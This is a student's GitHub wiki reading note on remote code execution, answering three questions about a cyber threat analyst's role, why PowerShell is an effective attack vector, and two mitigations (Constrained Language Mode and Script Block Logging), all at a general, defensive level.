Class 26 Reading: Remote Code Execution - taylortommy23/401-Reading-Notes GitHub Wiki

You just got a new job as a Cyber Threat Analyst, how would you explain your role to a family member?

  • My goal is to identify vulnerabilities in our systems before they can be exploited by cybercriminals and to develop strategies to prevent future attacks. Essentially, I'm like a digital detective, working to protect our digital assets from harm.

Explain what makes PowerShell such an effective attack vector.

  • PowerShell's combination of native integration with Windows systems, scripting capabilities, direct memory access, remote execution, and bypass techniques make it an effective attack vector for cybercriminals targeting Windows environments

What are two things you can do to mitigate attacks that leverage PowerShell?

  • Implement PowerShell Constrained Language Mode and use Script Block Logging